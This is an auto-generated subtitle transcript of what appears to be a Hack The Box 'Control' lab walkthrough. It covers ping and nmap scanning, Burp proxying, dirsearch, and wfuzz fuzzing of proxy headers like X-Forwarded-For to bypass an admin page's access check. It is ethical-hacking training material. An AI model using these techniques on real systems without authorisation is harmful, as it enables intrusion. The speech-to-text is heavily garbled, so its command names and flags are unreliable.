1 00:00:03,330 --> 00:00:09,810 OK, so now we're going to move into control right in this box, we're going to you're going to actually 2 00:00:09,810 --> 00:00:13,710 learn step by step everything from sequel injection, how it works manually. 3 00:00:13,950 --> 00:00:16,500 You're going to learn PowerShares seven. 4 00:00:17,070 --> 00:00:18,120 You're going to learn Khamal. 5 00:00:18,140 --> 00:00:23,940 It's going to learn, you know, the details of hacking and weaving it at the very end. 6 00:00:23,940 --> 00:00:27,570 We're going to look at the logs that are created in this attack once we compromised the box. 7 00:00:27,570 --> 00:00:34,170 And we, Poppit, you're going to actually see what would have been logged by a system like Splunk or 8 00:00:34,170 --> 00:00:37,560 ArcSight or Elk and Elk Stack like Kobana. 9 00:00:38,070 --> 00:00:42,840 So it's going to be very, very, very insightful to anyone that's wanting to get independent penetration 10 00:00:42,840 --> 00:00:46,400 testing, red teaming, and you got to learn the entire flow from start to finish. 11 00:00:46,420 --> 00:00:47,610 So this is going to be really fun. 12 00:00:47,850 --> 00:00:50,850 Let's just go ahead and just create the directory. 13 00:00:51,040 --> 00:00:56,290 So let's go and create a directory called Control and then we're going to KDDI into control. 14 00:00:57,300 --> 00:01:04,340 This just means if this side is true, sorry, at the left side is true, then the right side is should 15 00:01:04,350 --> 00:01:05,640 should be operated upon. 16 00:01:05,670 --> 00:01:09,390 So we're just basically joining both of these commands together. 17 00:01:10,650 --> 00:01:11,800 See, now we're in control. 18 00:01:12,180 --> 00:01:12,570 All right. 19 00:01:13,560 --> 00:01:14,640 So we've got nothing in here. 20 00:01:15,820 --> 00:01:16,750 Let's start, Himax. 21 00:01:18,300 --> 00:01:18,570 All right. 22 00:01:18,570 --> 00:01:26,280 So we're going to go ahead and name this tab, control a comma named VPN and then pseudo open VPN. 23 00:01:26,790 --> 00:01:30,090 And we're just basically pointing the config to our VPN file. 24 00:01:34,910 --> 00:01:43,220 All right, so we are connected to the VPN, right, so control AC control, Akama, Rickon, and let's 25 00:01:43,220 --> 00:01:48,370 just do a target and let's just save the IP address as a variable named Target. 26 00:01:49,790 --> 00:01:53,870 And then what we can do is we can do CEDO ping minus C. 27 00:01:54,710 --> 00:01:59,960 I want to count four pings if you leave this off and I'll just ping forever and then target, meaning 28 00:01:59,960 --> 00:02:03,640 we'll put the IP address in place of the variable name. 29 00:02:04,130 --> 00:02:06,050 We just want to make sure the target's active. 30 00:02:06,400 --> 00:02:11,240 Of course the target can be active even if it doesn't respond to Ping, but this is just one good test 31 00:02:11,240 --> 00:02:11,660 you can do. 32 00:02:11,870 --> 00:02:17,630 And of course, if the TTL is less than 128 but greater than 64, it's most likely a Windows box. 33 00:02:18,920 --> 00:02:24,500 So this is a prototype because you can discover the operating system of a target machine just by pinging 34 00:02:24,500 --> 00:02:25,670 it in many cases. 35 00:02:26,680 --> 00:02:27,950 So keep that in mind. 36 00:02:28,430 --> 00:02:30,380 Let's go ahead and run map against it. 37 00:02:32,090 --> 00:02:33,440 Let me explain what's happening here. 38 00:02:33,950 --> 00:02:36,980 So we're running in map with route privileges because then we get more data. 39 00:02:37,970 --> 00:02:43,570 Verbose means that as in map discovers open ports, it will display them. 40 00:02:43,580 --> 00:02:44,600 We won't have to finish. 41 00:02:44,630 --> 00:02:47,720 We won't have to wait until a map finishes before we see the results. 42 00:02:47,720 --> 00:02:49,520 We'll see the results as they're being discovered. 43 00:02:50,750 --> 00:02:53,300 Deshpande means don't bother pinging it. 44 00:02:53,540 --> 00:02:54,650 Just assume see, it's active. 45 00:02:55,460 --> 00:02:58,430 That's T5 is the most aggressive scan. 46 00:02:58,730 --> 00:03:03,800 T3 is usually what we would use in a real engagement because T5, if the box is weak, you might just 47 00:03:03,800 --> 00:03:06,980 knock it over from from inundating it with so many packets. 48 00:03:07,430 --> 00:03:11,390 And but since this is hack the box and it's a live environment, T5 should be OK. 49 00:03:12,320 --> 00:03:13,730 AC means wonderful scripts. 50 00:03:13,730 --> 00:03:16,510 Don't read any scripts that are going to run live. 51 00:03:16,520 --> 00:03:22,100 Exploits against the box again in map is kind of like Nessus and or like a typical vulnerability scanner. 52 00:03:22,430 --> 00:03:27,340 There's scripts that can run checks and in some cases attacks on the target. 53 00:03:27,350 --> 00:03:30,710 So you want to make sure that you don't run any target. 54 00:03:30,710 --> 00:03:35,930 You don't want any scripts that can potentially knock the box offline or cause it to reboot. 55 00:03:37,310 --> 00:03:39,020 And then the dash s.. 56 00:03:39,260 --> 00:03:43,100 Sorry, Dash, as in the movie means do the version checks. 57 00:03:44,030 --> 00:03:48,770 So what I did was actually just concatenated two different flags together in one flag. 58 00:03:50,120 --> 00:03:56,420 And this is really cool because Intermap has the ability to identify a service that's running on a non-standard 59 00:03:56,420 --> 00:03:56,780 port. 60 00:03:57,080 --> 00:03:57,350 Right. 61 00:03:57,370 --> 00:04:04,700 So if you have, for example, FTP running on Port 25, you know, it might be smart enough to know 62 00:04:04,700 --> 00:04:10,310 that you're not running SMTP because it runs a series of checks against that port to do everything it 63 00:04:10,310 --> 00:04:15,230 can to ascertain what service really resides in that port. 64 00:04:15,230 --> 00:04:18,200 And it's kind of detailed how it does it, but it really does do it. 65 00:04:18,210 --> 00:04:21,080 I've done some testing here and it's really amazing how in that works. 66 00:04:22,610 --> 00:04:23,780 That's Dashon. 67 00:04:25,020 --> 00:04:29,030 I mean, do you want the config file to be you want the output to be stored in the in map file, which 68 00:04:29,030 --> 00:04:31,060 is just a file that saves the output. 69 00:04:31,940 --> 00:04:37,550 This DP zero six five five thirty five means you want to scan all ports from Port zero to six five five 70 00:04:37,550 --> 00:04:38,090 three five. 71 00:04:38,630 --> 00:04:46,070 A lot of times people will put in dash p dash like this and that scans ports one to six five five three 72 00:04:46,070 --> 00:04:47,420 five, but it misses Port zero. 73 00:04:48,140 --> 00:04:54,620 So putting in that, this full port range gets port zero as well because sometimes it will show up. 74 00:04:54,770 --> 00:04:59,510 So that's another tip that you can use that finally you want the reason to be displayed if the ports 75 00:04:59,510 --> 00:05:03,770 blocked and then finally the target, which is a variable for the IP address. 76 00:05:05,270 --> 00:05:05,670 Here we go. 77 00:05:05,690 --> 00:05:10,880 We're off to the races, and while MAP is scanning, you can always press the space bar key to get an 78 00:05:10,880 --> 00:05:12,230 update about its progress. 79 00:05:14,420 --> 00:05:14,750 All right. 80 00:05:14,750 --> 00:05:19,070 So as it scans, let's just go to investigate because we can see that RPK is listening. 81 00:05:19,100 --> 00:05:25,040 This is this is my school and this is port eighty six point eighty typically has the broadest attack 82 00:05:25,040 --> 00:05:25,400 surface. 83 00:05:25,400 --> 00:05:28,910 We should start with the Web and I'm not even sure what this port is. 84 00:05:29,810 --> 00:05:35,750 So we'll create a new pain control, a sea control comma discovery. 85 00:05:36,950 --> 00:05:39,740 And let's just open up a browser. 86 00:05:41,570 --> 00:05:47,660 And as open up as well, so we can passively spirt the host as we poke around the page. 87 00:05:49,980 --> 00:05:52,290 So I'm going to go ahead and select berp from here. 88 00:06:03,500 --> 00:06:04,460 All right, sweet. 89 00:06:04,580 --> 00:06:12,160 So let's look at the options, control ship options, and I just want to make sure that the survey responses 90 00:06:12,180 --> 00:06:13,160 are also intercepted. 91 00:06:15,130 --> 00:06:20,350 Let's go back to intercept and let's take intercept off, it's just just going to filter all the traffic 92 00:06:20,350 --> 00:06:22,330 through berp so I can build out this target tab. 93 00:06:23,670 --> 00:06:26,440 You can build out a site map while we browse. 94 00:06:32,190 --> 00:06:36,660 The page is loaded and we can just, you know, scroll through it of the titles Fidelity, I don't know 95 00:06:36,660 --> 00:06:37,440 what that means. 96 00:06:38,100 --> 00:06:39,870 You know, it says the future has landed. 97 00:06:40,820 --> 00:06:41,960 Who knows what that means? 98 00:06:42,390 --> 00:06:47,130 You know, we could try putting SQL injection testing into a sequel injection by putting a single tick 99 00:06:47,760 --> 00:06:48,030 back. 100 00:06:48,120 --> 00:06:49,470 Just takes it to the top of the page. 101 00:06:50,160 --> 00:06:52,170 You can actually tell that by this anchor tag. 102 00:06:53,130 --> 00:06:56,900 I mean, all these links down here look like they don't really go anywhere. 103 00:06:57,690 --> 00:06:58,730 We don't have a copyright date. 104 00:06:58,740 --> 00:07:02,730 Sometimes you can find if there's a copyright date down here that's like, you know, in the past, 105 00:07:02,940 --> 00:07:04,830 then you can search for exploits against us. 106 00:07:05,250 --> 00:07:08,160 But we could see, you know, just running WordPress or something similar. 107 00:07:08,970 --> 00:07:13,050 There's also an admin page and a login portal. 108 00:07:13,050 --> 00:07:14,520 So we press control you. 109 00:07:15,450 --> 00:07:24,630 We get the source control F lets you search for like KRED or Key or pass or salt. 110 00:07:26,230 --> 00:07:27,270 We look for comments. 111 00:07:28,450 --> 00:07:31,680 So right away we see this comment here. 112 00:07:32,170 --> 00:07:37,140 Looks like the developer left it to do list inside of the source code that basically says, you know, 113 00:07:37,140 --> 00:07:40,200 we need to import products and we need to link to a new payment system. 114 00:07:40,500 --> 00:07:45,540 And it gives us an internal IP, which is interesting. 115 00:07:45,540 --> 00:07:45,750 Right. 116 00:07:45,770 --> 00:07:47,850 So this would be a finding, right. 117 00:07:47,860 --> 00:07:54,720 So what we actually would do is we do control I think it's control print screen or is it control shift 118 00:07:54,720 --> 00:07:55,320 print screen. 119 00:07:56,070 --> 00:07:57,420 Yeah, control just print screen. 120 00:07:57,930 --> 00:08:02,220 And then you would grab this and put it in a report to the client. 121 00:08:04,720 --> 00:08:06,640 But yeah, so that's really interesting. 122 00:08:07,000 --> 00:08:12,970 We could keep looking for other comments, we could also look for like JavaScript. 123 00:08:15,470 --> 00:08:19,670 And we can go through all of these if we wanted to, but let's look at berp found. 124 00:08:22,130 --> 00:08:25,760 So we've already got some stuff, here is a site map. 125 00:08:27,840 --> 00:08:28,920 And. 126 00:08:30,910 --> 00:08:38,530 You can see there's some JavaScript files, there's some success, and there's a bunch of other things. 127 00:08:38,860 --> 00:08:43,300 So what I like to do is I like to write, click and see at a scope and then click inside of here and 128 00:08:43,300 --> 00:08:44,740 say so only in scope items. 129 00:08:44,740 --> 00:08:49,840 That way, if I'm browsing Google or Facebook or whatever else I'm browsing, that's not going to filter 130 00:08:49,840 --> 00:08:50,560 into the sitemap. 131 00:08:50,560 --> 00:08:53,840 I'm only going to see what's relevant to this particular target. 132 00:08:54,280 --> 00:08:59,500 In addition, if you look in the bottom right here, you can see that this is powered by seven 737 and 133 00:08:59,500 --> 00:09:00,880 it looks like it's running is ten. 134 00:09:01,660 --> 00:09:06,850 Now, I ten can either be Windows 10, windows twenty sixteen or windows twenty nineteen, we don't 135 00:09:06,850 --> 00:09:07,150 know. 136 00:09:07,750 --> 00:09:12,250 But it's running on windows, which is interesting because most Windows applications are running. 137 00:09:13,630 --> 00:09:19,250 You would expect, you know, something other than one of the things that's really interesting about 138 00:09:19,250 --> 00:09:20,050 this target already. 139 00:09:20,080 --> 00:09:22,450 I can tell you is that it's running MySQL. 140 00:09:22,450 --> 00:09:26,020 So if we go back here, let's go back to EMAP until one. 141 00:09:26,710 --> 00:09:30,880 But it's running MySQL, not Microsoft SQL Server. 142 00:09:30,880 --> 00:09:35,050 So this is an interesting stack, security stack and interesting configuration. 143 00:09:35,050 --> 00:09:38,610 And we're probably going to find some interesting things through this engagement. 144 00:09:39,850 --> 00:09:42,490 So let's go back to the page. 145 00:09:43,190 --> 00:09:44,410 Let's just go to Admon. 146 00:09:46,230 --> 00:09:51,720 And it gives us an interesting messages, has access denied, heter missing, please ensure you go through 147 00:09:51,930 --> 00:09:53,790 the proxy to access this page. 148 00:09:54,220 --> 00:10:01,080 So it's almost it's almost appears that this Web application is implementing access control via a custom 149 00:10:01,440 --> 00:10:05,130 HTTP header, which currently isn't present. 150 00:10:05,130 --> 00:10:07,790 And therefore, I wasn't granted access to this admin page. 151 00:10:07,800 --> 00:10:10,860 So if we knew what that header combination was, we might be able to gain access to this. 152 00:10:12,240 --> 00:10:13,840 Now, before we figure this out. 153 00:10:13,860 --> 00:10:15,890 Let's go ahead and have something running in the background. 154 00:10:16,680 --> 00:10:18,870 So we've already got a map running in the background and still running. 155 00:10:18,870 --> 00:10:24,330 I can put spacebar to check on it looks like it's almost 60 percent done, but we can run some discovery. 156 00:10:24,330 --> 00:10:27,150 So control data, let's run our search. 157 00:10:39,480 --> 00:10:47,340 Control a shift that will, quote, control a hold down control press down and then in its bottom pane 158 00:10:47,340 --> 00:10:50,830 we can type a pseudo opt the research. 159 00:10:50,870 --> 00:10:52,430 I'm going to explain everything that happens here. 160 00:10:52,440 --> 00:10:56,840 So we're starting with the research where I get the research. 161 00:10:57,090 --> 00:10:57,750 I just Googled. 162 00:10:57,840 --> 00:10:59,160 Right, so you can go to Google. 163 00:11:01,900 --> 00:11:05,960 And first thing, we take off berp. 164 00:11:08,390 --> 00:11:09,950 Their search, GitHub. 165 00:11:12,520 --> 00:11:13,300 This right here, right? 166 00:11:16,000 --> 00:11:24,430 And then you can just go get carbon copy, and then all I did was I just went into the op directory 167 00:11:25,420 --> 00:11:26,650 and then ran Git Clone. 168 00:11:26,650 --> 00:11:37,690 So literally all I did was I went here and went opt for that pseudo git clone and then put in that the 169 00:11:37,690 --> 00:11:41,200 GitHub repository path and dot to basically save it there. 170 00:11:41,740 --> 00:11:44,980 When you do that, you have it control you, you to delete it. 171 00:11:45,590 --> 00:11:55,900 And let's go back up and get the help for control a lot bracket page up, page up and down a little 172 00:11:55,900 --> 00:11:56,060 bit. 173 00:11:56,060 --> 00:11:59,380 So now we can investigate what we can do with this awesome tool. 174 00:12:01,960 --> 00:12:07,120 So what we're doing first is we want a new URL, right, the target. 175 00:12:07,690 --> 00:12:12,070 So technically, what we could do here is we could control, control, control, control left. 176 00:12:12,490 --> 00:12:16,530 I can just put in SCDP target. 177 00:12:17,290 --> 00:12:20,950 Actually, that won't work because the variable is session specific. 178 00:12:21,130 --> 00:12:25,900 And so if I go up here, plus page down, page down, I say echo. 179 00:12:27,370 --> 00:12:29,570 I go target. 180 00:12:30,400 --> 00:12:31,260 Nothing happens, right? 181 00:12:31,780 --> 00:12:35,770 That's because it was saved in the previous pain, this one. 182 00:12:36,780 --> 00:12:37,880 Which now heightmap is finished? 183 00:12:37,950 --> 00:12:40,320 Why do I go here, Target, you'll see it. 184 00:12:41,400 --> 00:12:46,170 So what we could do is we could just go down here, we could save it, but we don't need to just put 185 00:12:46,170 --> 00:12:46,770 in the address. 186 00:12:50,470 --> 00:12:52,150 So we're saying scan this target 187 00:12:55,060 --> 00:13:05,680 dap dap at all, yeah, that's any word capital E means that we want to do a search for common extension's 188 00:13:05,680 --> 00:13:07,950 right, use a predefined list of common extensions. 189 00:13:07,960 --> 00:13:09,760 We know there's but there may be others. 190 00:13:10,520 --> 00:13:12,630 Technically, we could just do a dash e-space. 191 00:13:14,620 --> 00:13:18,550 But we're just going to include some common extensions so we can have a little bit more of a verbose 192 00:13:18,550 --> 00:13:21,670 of a scan of 50 threads. 193 00:13:22,600 --> 00:13:23,890 You know, I usually start with 50. 194 00:13:23,890 --> 00:13:28,210 Sometimes if you put too many threats against a vulnerable Web server or a Web server that's under-resourced, 195 00:13:28,210 --> 00:13:30,370 it could just crash or reboot. 196 00:13:30,970 --> 00:13:31,990 That's not what you want. 197 00:13:33,010 --> 00:13:36,070 So we'll just keep the thread, the thread count relatively low. 198 00:13:39,830 --> 00:13:44,570 And then the other thing I'd like to do is I'd like to put random user agents in the scanner, you know, 199 00:13:44,570 --> 00:13:51,620 sometimes if, you know, the target is running some kind of Web application firewall or something similar, 200 00:13:52,220 --> 00:13:57,380 if you see the scan coming from a non browser, in other words, the user agent doing shows door search 201 00:13:57,830 --> 00:13:58,870 and it might just block that. 202 00:13:59,030 --> 00:14:01,640 It might just block the scan activity, the recon activity. 203 00:14:01,670 --> 00:14:05,330 So here we're just can use a bunch of random user agents as it's scanning. 204 00:14:06,260 --> 00:14:12,890 And then we're going to output the report to this file called Dirceu to e-mail. 205 00:14:12,890 --> 00:14:14,390 And then we're just going to use this word list. 206 00:14:16,390 --> 00:14:18,400 Which is a common word that's that's included with Callie. 207 00:14:19,810 --> 00:14:20,710 Hopefully that makes sense. 208 00:14:21,040 --> 00:14:26,800 So I'm just going to go ahead and make sure I'm in the bottom pained by person, control a down arrow 209 00:14:26,800 --> 00:14:29,140 and the prosecutor entering the password. 210 00:14:29,140 --> 00:14:31,570 And let's go to go up. 211 00:14:33,460 --> 00:14:34,210 Going to exit the top. 212 00:14:35,170 --> 00:14:35,450 All right. 213 00:14:35,470 --> 00:14:39,940 So now we've got some recon going on in the background and Intermap is finished. 214 00:14:39,940 --> 00:14:40,340 Finished. 215 00:14:40,360 --> 00:14:45,910 If we do cat control that map, we should see the file. 216 00:14:47,200 --> 00:14:48,640 So already we can see a couple of things, right. 217 00:14:49,600 --> 00:14:52,480 One point eighty where we knew that was running Microsoft. 218 00:14:52,480 --> 00:14:53,020 I yes. 219 00:14:54,010 --> 00:14:58,530 And here's some scripts that ran it determine that these methods are supported. 220 00:14:58,570 --> 00:14:59,290 This is nothing big. 221 00:14:59,290 --> 00:15:00,010 I see this a lot. 222 00:15:00,400 --> 00:15:03,070 And it's just showing that, you know, these are the methods that are supported. 223 00:15:03,070 --> 00:15:06,160 Trece can particularly can can potentially be a vulnerability. 224 00:15:06,160 --> 00:15:07,300 But it isn't in this case. 225 00:15:08,440 --> 00:15:15,430 And this is just the again, the server name Fidelity is the title of the webpage which we saw when 226 00:15:15,430 --> 00:15:20,020 we went back to this page here, CNN Tabar and 135. 227 00:15:20,020 --> 00:15:22,780 This is Microsoft Windows RPC Remote Procedure Call. 228 00:15:22,780 --> 00:15:26,590 This is a legacy point that's usually open and all Windows boxes, very small attacks. 229 00:15:26,590 --> 00:15:29,320 Service three, three or six is my sequel. 230 00:15:29,320 --> 00:15:34,690 And you can see here it actually tried to connect, but it wasn't allowed to connect. 231 00:15:34,780 --> 00:15:36,460 For example, if I do this MySQL. 232 00:15:39,240 --> 00:15:43,200 And I do h and I put ten, ten, ten, one sixty, 167. 233 00:15:45,860 --> 00:15:46,370 Look at that. 234 00:15:46,530 --> 00:15:51,380 See, the error message I got is not allowed to connect to this Moradi server already, by the way, 235 00:15:51,380 --> 00:15:52,510 is another name for my school. 236 00:15:53,480 --> 00:15:55,270 You can see that same error message up here. 237 00:15:55,880 --> 00:15:59,810 So it literally just tried to do what we did and it got the same message back then. 238 00:15:59,810 --> 00:16:02,780 We have a few high level ports and that's really it. 239 00:16:03,410 --> 00:16:06,800 OK, and if you go back to discover, you can see this is still running. 240 00:16:07,250 --> 00:16:15,170 So let's go back to the Web page and look at this custom header and then maybe we can Google some custom 241 00:16:15,170 --> 00:16:15,500 matters. 242 00:16:15,500 --> 00:16:15,740 Right? 243 00:16:16,280 --> 00:16:16,970 So we got to Google. 244 00:16:18,040 --> 00:16:18,740 What type? 245 00:16:19,070 --> 00:16:19,880 What should we Google? 246 00:16:20,450 --> 00:16:28,190 Well, we can say like header proxy, maybe HTP header proxy. 247 00:16:28,220 --> 00:16:31,550 Let's try that HDB header proxy. 248 00:16:34,000 --> 00:16:34,900 Click the first link. 249 00:16:36,480 --> 00:16:41,460 And see what we've got, that's just type everything for oops. 250 00:16:44,010 --> 00:16:44,930 That's what I did there. 251 00:16:45,750 --> 00:16:51,150 Control F, I'm going to search for proxy and just go down the list to find something proxy's. 252 00:16:51,300 --> 00:16:51,480 Yeah. 253 00:16:51,490 --> 00:16:51,940 Here we go. 254 00:16:53,220 --> 00:16:57,390 So here's some headers that we can add to a word list in. 255 00:16:57,390 --> 00:17:04,140 The idea here is I want to try to fuzz these fields to see if I can find a header that will grab me 256 00:17:04,140 --> 00:17:05,460 access to this admin portal. 257 00:17:06,940 --> 00:17:14,760 So control AC, control a comma for us, and we'll create new file pseudo vim headers that text. 258 00:17:18,300 --> 00:17:19,800 I control be. 259 00:17:21,760 --> 00:17:31,180 Interesting control, Murphy, there we go, escape to go to the top to delete down our tweet line down 260 00:17:31,180 --> 00:17:35,290 Arrow did delete line down Arrow did like delete line and so on. 261 00:17:35,830 --> 00:17:42,310 Netscape is easy to see the file cat headers just to make sure it's there and it is now we're going 262 00:17:42,310 --> 00:17:46,510 to use us to find some fields here. 263 00:17:47,740 --> 00:17:54,100 So again, I'd like to split the panes, control a shift, double quote, control a hold down control 264 00:17:54,100 --> 00:17:55,090 while I press the down arrow. 265 00:17:55,840 --> 00:17:59,260 I like to use the bottom pane to build out my command of the top pane to look at the help file. 266 00:18:00,730 --> 00:18:04,210 I find this very useful in running these tools. 267 00:18:06,680 --> 00:18:08,210 All right, so what are we doing here? 268 00:18:10,400 --> 00:18:13,220 I just pressed the right ariki to autocomplete this. 269 00:18:13,250 --> 00:18:14,830 So let me let me explain what's happening here. 270 00:18:16,990 --> 00:18:25,030 First, we have Dachsie to see if colors I like colors for both, that's what the Dash V is. 271 00:18:25,600 --> 00:18:28,210 OK, Dashti, again, you probably can guess this. 272 00:18:28,830 --> 00:18:30,070 What do you think Dashty stands for? 273 00:18:30,580 --> 00:18:35,590 He said the Reds are awesome number of current Connexions tennis default. 274 00:18:35,620 --> 00:18:36,400 We're doing 50. 275 00:18:37,660 --> 00:18:39,910 Then we need a wordlist. 276 00:18:42,160 --> 00:18:48,040 Actually, we need the euro, so I've got the URL here as well right here, and we're fuzzing specifically 277 00:18:48,040 --> 00:18:54,730 this this endpoint, this admin file, the admin, that endpoint, because that's where we saw that 278 00:18:55,240 --> 00:18:58,480 message control because that's that's what we saw this. 279 00:18:59,200 --> 00:19:01,630 And what else do we need? 280 00:19:01,630 --> 00:19:03,550 We need the header to dash H. 281 00:19:04,480 --> 00:19:12,220 If you look in the help, you'll see that the header looks like it's this format so we can put fuzz 282 00:19:12,220 --> 00:19:12,550 anywhere. 283 00:19:12,550 --> 00:19:16,330 We want to replace a name with something from our word list. 284 00:19:16,930 --> 00:19:17,180 Right. 285 00:19:17,250 --> 00:19:26,320 So I want to fuzz this value so we can go back down here, we can type files and we'll just put one 286 00:19:26,560 --> 00:19:30,910 seven zero zero one and you'll see what's happening in a moment. 287 00:19:30,940 --> 00:19:34,830 Watch what happens when I present control azy. 288 00:19:35,350 --> 00:19:37,870 So you can see here we're actually getting a ton of response for everything. 289 00:19:38,260 --> 00:19:38,880 What's going on? 290 00:19:38,890 --> 00:19:41,650 We need to probably filter this through a proxy so we can investigate. 291 00:19:44,510 --> 00:19:46,880 Control elite bracket slash proxy. 292 00:19:49,250 --> 00:19:58,310 And if we do drop, we could put a proxy in this format and view it if you go to berp control SFP. 293 00:20:00,190 --> 00:20:08,500 You can see we're listening on localhost eighty stewardship 127 seven zero zero one, that's the Ippy. 294 00:20:10,110 --> 00:20:15,090 Then we have a port 80, 80, and then we have eight type. 295 00:20:17,650 --> 00:20:24,610 SCDP, right, go back to birth control Sharpey Intercept to make sure this is on. 296 00:20:25,980 --> 00:20:26,790 And then Prusiner. 297 00:20:29,910 --> 00:20:36,150 All right, so you notice you could see here's us and here's the header. 298 00:20:37,260 --> 00:20:39,330 That came from our headers file, right? 299 00:20:39,450 --> 00:20:40,380 Was the first one on the list. 300 00:20:41,070 --> 00:20:48,540 Do you control a shift that will, quote, cut headers that text control easy to make it big? 301 00:20:50,230 --> 00:20:52,950 Looks like forwarded was not the first one on the list exploded host. 302 00:20:53,700 --> 00:20:54,870 So it's doing this one right now. 303 00:20:55,890 --> 00:20:59,190 And we look forward doing X voted for. 304 00:21:00,570 --> 00:21:05,970 And then we go forward again and stepping forward it so I'm guessing the next one's going to be the. 305 00:21:08,370 --> 00:21:13,740 OK, well, it's not, but it is another header inside of our list, Explorative Proteau. 306 00:21:15,430 --> 00:21:20,440 And this is probably the media, so it looks like it's random randomly selecting it, but the point 307 00:21:20,440 --> 00:21:22,690 here is that it's getting it's working. 308 00:21:22,720 --> 00:21:25,510 I mean, the thing, the requestion, but we're getting 200 for everything. 309 00:21:25,930 --> 00:21:27,720 I'm not seeing the response for some reason. 310 00:21:30,740 --> 00:21:31,670 I am seeing the response. 311 00:21:31,710 --> 00:21:32,530 It is a response. 312 00:21:32,570 --> 00:21:38,870 OK, so let's go back over here and let's think about this. 313 00:21:39,510 --> 00:21:40,130 Let's see. 314 00:21:42,140 --> 00:21:43,430 Let's take off this proxy bit. 315 00:21:45,370 --> 00:21:49,510 And let's also fuzz the IP address. 316 00:21:50,790 --> 00:21:56,430 So we could put in well, let's just put it in the IP address of the server, 10, 10, 10, one 67. 317 00:22:00,760 --> 00:22:06,200 Same problem to hundreds control, easy to get back out of control. 318 00:22:06,550 --> 00:22:08,650 Up, up, up, up, up, up, up, up, up, up, up. 319 00:22:10,450 --> 00:22:19,270 So if we go back to the source code and its Web app, lets go back control you. 320 00:22:21,680 --> 00:22:26,480 You'll see it has its IP, this IP in the 191 64 network. 321 00:22:29,770 --> 00:22:38,440 So we probably want to do is we want to iterate we could use this IP here as the IP in the header or 322 00:22:38,440 --> 00:22:44,020 we could create a Python script or battlegroup or something and just sort of print out all the hosts 323 00:22:44,020 --> 00:22:50,020 in it before that zero subnet and see if we can just test all those against all the combinations of 324 00:22:50,020 --> 00:22:58,300 HTP request headers and see which one gives us a different result than what we're seeing in us. 325 00:22:59,230 --> 00:22:59,590 Right. 326 00:23:00,730 --> 00:23:01,970 So let me show you what I mean. 327 00:23:01,990 --> 00:23:03,910 So first, let's see if we can use Python to do this. 328 00:23:04,510 --> 00:23:12,230 Kronish a new tab control AC comma dev code def Python three. 329 00:23:13,030 --> 00:23:13,840 So if we say like. 330 00:23:15,370 --> 00:23:26,290 Let's see from that ADR import IP network and we can say for IP in IP network. 331 00:23:29,050 --> 00:23:32,590 Ninety one six eight zero four zero 24. 332 00:23:33,880 --> 00:23:43,600 Colin Tabb, print IP before we press enter, just let you know we're importing this IP network module 333 00:23:44,200 --> 00:23:48,970 from this particular library and they were saying every time you loop, we're going to create a loop 334 00:23:49,630 --> 00:23:56,440 and we're going to loop through the each host and then we're 90, 160, 4.0 network. 335 00:23:56,740 --> 00:23:58,020 So this is a 24 bit math. 336 00:23:58,030 --> 00:24:00,820 So it's actually 28, 255, 255 that 255 zero. 337 00:24:00,820 --> 00:24:01,120 Right. 338 00:24:01,880 --> 00:24:04,280 Is going to go 190, 168 for that one. 339 00:24:04,300 --> 00:24:05,080 It's going to point that out. 340 00:24:05,380 --> 00:24:08,050 That's going to be the IP the first time through second time through. 341 00:24:08,050 --> 00:24:10,810 It's going to be 192 168 for that too. 342 00:24:11,230 --> 00:24:11,530 Right. 343 00:24:11,740 --> 00:24:12,340 Print that out. 344 00:24:12,340 --> 00:24:14,740 And so on and so forth until you get to 255. 345 00:24:15,310 --> 00:24:18,010 So if this works and it does, we have what we need. 346 00:24:18,880 --> 00:24:22,120 So let's go ahead and create a script. 347 00:24:23,560 --> 00:24:26,050 Before we do that, we want to make sure we use the right version of Python. 348 00:24:26,680 --> 00:24:27,370 The location. 349 00:24:28,450 --> 00:24:30,100 You'll see why I'm doing this in a second. 350 00:24:31,300 --> 00:24:37,800 Zero them let's call it eyepiece that texte. 351 00:24:39,410 --> 00:24:40,870 Oh, I'm sorry, what am I doing? 352 00:24:42,320 --> 00:24:43,160 It's not what we're doing here. 353 00:24:45,050 --> 00:24:46,430 We're doing what we're doing here. 354 00:24:46,460 --> 00:24:51,740 We're creating a pseudo IP that wipes out PI. 355 00:24:53,470 --> 00:24:54,700 IP ipy. 356 00:24:58,210 --> 00:25:05,170 All right, so I'm going to do a shabangu at the top controls of the and that just tells the bombshell 357 00:25:05,320 --> 00:25:07,090 that what we're executing is a Python script. 358 00:25:07,360 --> 00:25:11,800 So we can say from that ADR import IP network. 359 00:25:15,640 --> 00:25:25,930 For IP in IP Network 160 zero DOT 4.0, sorry, Colen, and then we could just do print IP. 360 00:25:27,710 --> 00:25:38,930 Escape easy, soroche mod plus X, make it executable and everything else minus LHR on IPIS, we should 361 00:25:38,930 --> 00:25:43,130 see that it is now executable by everyone, right? 362 00:25:43,730 --> 00:25:44,570 Anyone can run it. 363 00:25:45,440 --> 00:25:48,630 Anyone in the group can run it and root himself can run it. 364 00:25:49,790 --> 00:25:57,500 So if we just did like let's see we did this, it runs right. 365 00:25:58,070 --> 00:25:59,120 So let's scrap this whole thing. 366 00:25:59,570 --> 00:26:03,410 Space page by page by page by page by page by page by page up. 367 00:26:03,680 --> 00:26:04,400 Page down. 368 00:26:05,210 --> 00:26:05,510 Right. 369 00:26:06,090 --> 00:26:07,190 Let's go right here. 370 00:26:07,190 --> 00:26:08,150 And we're going to press. 371 00:26:09,410 --> 00:26:21,530 Enter Cyro, them IPPs that I control a right bracket, escape Schifrin's, cat IPPs, that text to 372 00:26:21,530 --> 00:26:22,250 make sure it's their. 373 00:26:23,580 --> 00:26:31,980 IP, that text is there this week, so we can now go back to the first tab and continue to build our 374 00:26:31,980 --> 00:26:32,380 query. 375 00:26:32,940 --> 00:26:36,660 Now we're going to do in addition to the headers, remember what we're doing shift. 376 00:26:37,900 --> 00:26:40,210 Percent if you Dukat headers. 377 00:26:42,470 --> 00:26:45,080 Right out to complete, we're now going to also do. 378 00:26:48,840 --> 00:26:55,560 These types, right, so let's close this out, we can say a second wordlist. 379 00:26:57,540 --> 00:27:00,940 And we're going to put in piece that 380 00:27:03,600 --> 00:27:10,860 instead of having this 10, 10, 10, 167 static IP, we're going to do a second one for Fuzz to see. 381 00:27:11,400 --> 00:27:12,270 How did I know to do that? 382 00:27:12,540 --> 00:27:20,430 Because if I do, if I go up here, control a lit bracket, page by page, a page up, you'll see this 383 00:27:22,110 --> 00:27:25,530 fuzz into in is a variable for a number. 384 00:27:25,770 --> 00:27:29,670 Wherever you put these keyword will replace them with the values of the specified payload. 385 00:27:30,420 --> 00:27:31,730 So we're putting these keywords here. 386 00:27:32,700 --> 00:27:39,240 So the first word list goes in its place and the second word list for 